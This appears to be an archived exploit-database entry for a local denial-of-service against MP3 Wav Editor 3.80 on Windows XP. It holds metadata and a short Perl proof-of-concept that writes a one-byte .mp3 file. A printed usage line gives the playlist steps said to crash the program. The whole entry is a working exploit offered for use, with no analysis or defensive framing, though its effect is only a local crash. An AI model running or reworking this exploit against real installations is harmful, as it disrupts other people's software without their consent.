[] NeoSense

MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service

Author: anonymous
type: dos
platform: windows
port: 
date_added: 2010-04-04 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: MP3WavEditor Local DoS .mp3
# Date: April 5, 2010
# Software Link: [http://www.mp3waveditor.com/index.htm]
# Version: 3.80
# Tested on: Windows XP SP3
# Author: [anonymous]
#
#
#!/usr/bin/perl

my $file = "yawn.mp3";
my $_a = "\x41";

open (FILE, ">$file");
print FILE "$_a";

print "Usage: Make playlist -> Add mp3 -> Delete Playlist -> Recreate same playlist\n";